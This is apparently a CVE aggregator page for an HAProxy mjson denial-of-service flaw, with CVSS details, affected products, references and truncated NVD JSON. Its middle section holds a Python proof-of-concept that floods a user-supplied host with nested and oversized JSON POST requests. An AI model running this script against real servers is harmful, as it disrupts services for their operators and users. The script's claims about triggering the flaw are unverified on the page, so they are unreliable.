CVE-2025-11230

Description

Inefficient algorithm complexity in mjson in HAProxy allows remote attackers to cause a denial of service via specially crafted JSON requests.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:haproxy:aloha_appliance:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:* - VULNERABLE

HAProxy mjson < 修复版本

具体受影响版本需参考官方发布的安全公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import json
import time

def create_malicious_json(depth=100):
    """
    Generate deeply nested JSON to trigger algorithm complexity issue
    in HAProxy mjson library
    """
    payload = {}
    current = payload
    for i in range(depth):
        current[f'level_{i}'] = {}
        current = current[f'level_{i}']
    return json.dumps(payload)

def create_explosive_json(element_count=1000):
    """
    Generate JSON with many repeated elements to cause
    exponential parsing time in mjson
    """
    return json.dumps({'data': [{'key': f'value_{i}'} for i in range(element_count)]})

def exploit_cve_2025_11230(target_host, target_port=80):
    """
    PoC for CVE-2025-11230: HAProxy mjson DoS vulnerability
    Sends crafted JSON to trigger inefficient algorithm complexity
    """
    # Method 1: Deep nesting attack
    nested_payload = create_malicious_json(depth=500)
    
    # Method 2: Element explosion attack
    explosive_payload = create_explosive_json(element_count=5000)
    
    for i, payload in enumerate([nested_payload, explosive_payload]):
        print(f'Sending attack payload {i+1}...')
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        try:
            sock.connect((target_host, target_port))
            request = f'POST / HTTP/1.1\r\n'
            request += f'Host: {target_host}\r\n'
            request += f'Content-Type: application/json\r\n'
            request += f'Content-Length: {len(payload)}\r\n'
            request += f'\r\n{payload}'
            sock.sendall(request.encode())
            print(f'Payload {i+1} sent successfully')
        except Exception as e:
            print(f'Error sending payload {i+1}: {e}')
        finally:
            sock.close()
        time.sleep(1)

if __name__ == '__main__':
    target = input('Enter target HAProxy host: ')
    port = int(input('Enter port (default 80): ') or '80')
    exploit_cve_2025_11230(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11230
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11230
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11230/
[4] VulDB https://vuldb.com/cve/CVE-2025-11230
[5] https://www.haproxy.com/blog/october-2025-cve-2025-11230-haproxy-mjson-library-denial-of-service-vulnerability

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11230", "sourceIdentifier": "[email protected]", "published": "2025-11-19T10:15:45.020", "lastModified": "2025-12-19T16:44:55.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inefficient algorithm complexity in mjson in HAProxy allows remote attackers to cause a denial of service via specially crafted JSON requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:aloha_appliance:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.5.0", "versionEndExcluding": "14.5.33", "matchCriteriaId": "89F5C682-A34A-4B37-A271-8692708B61A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:aloha_appliance:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.5.0", "versionEndExcluding": "15.5.28", "matchCriteriaId": "C09F7887-BC26-4228-8CC3-F50ADB5A57A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:aloha_appliance:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.5.0", "versionEndExcluding": "16.5.19", "matchCriteriaId": "C3138FAF-4B62-473C-8CC5-12FAA99BF7D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:aloha_appliance:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.0", "versionEndExcluding": "17.0.7", "matchCriteriaId": "C5B4D993-4C11-4D32-A071-4E96D54E6067"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.4.30", "matchCriteriaId": "29441137-F078-48A2-9222-4B3BB210CE5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.0", "versionEndExcluding": "2.6.23", "matchCriteriaId": "68DBA1BA-AAA7-4105-8FE4-3997D8739D9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.8.0", "versionEndExcluding": "2.8.16", "matchCriteriaId": "D2E3634B-D997-4F5A-B163-715204FF5E9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.12", "matchCriteriaId": "87B62C89-3578-4A51-9BF6-AA796EE7B0BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.1.0", "versionEndExcluding": "3.1.9", "matchCriteriaId": "0FD13450-6260-49B9-A9B1-6C2D17146FCA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.6", "matchCriteriaId": "957368C8-D147-4EAE-AC22-5F6660BC6998"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-253.271:*:*:*:*:*:*", "matchCriteriaId": "D0E40014-EA6C-4521-89D7-0FB722261501"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-254.271:*:*:*:*:*:*", "matchCriteriaId": "25380A20-831C-4494-8659-103375D1074F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-259.342:*:*:*:*:*:*", "matchCriteriaId": "BC635BE1-161A-453B-A5DE-F30079E41273"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-263.343:*:*:*:*:*:*", "matchCriteriaId": "7F705DCD-2A71-4A5F-8C43-AC2F3E398B05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-264.356:*:*:*:*:*:*", "matchCriteriaId": "35DFC7FB-EE31-475C-AEBA-273089521A93"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-268.356:*:*:*:*:*:*", "matchCriteriaId": "2AC3898A-4194-4896-A135-BD0DE9928291"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-268.373:*:*:*:*:*:*", "matchCriteriaId": "D73FBC8F-DB12-4C7F-9242-4A42CD56AD38"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-268.459:*:*:*:*:*:*", "matchCriteriaId": "C0E7CC9E-F8A6-4F36-A3DE-CF5C109E8AC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-268.464:*:*:*:*:*:*", "matchCriteriaId": "DB408D95-D8B8-42B4-9FA0-C83444D87863"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-268.477:*:*:*:*:*:*", "matchCriteriaId": "F5F2AD1B-5A01-4528-8059-F34BAD131203"}, {"vulnerable": true, "criteria": "cpe:2.3:a:haproxy:haproxy_enterprise:2.4r1:1.0.0-268.499:*:*:*:*:*:*", "matchCriteriaId": "BD1DAB21-6F47-40B1-8AA3-170DDBF52B77"}, {"vulner ... (truncated)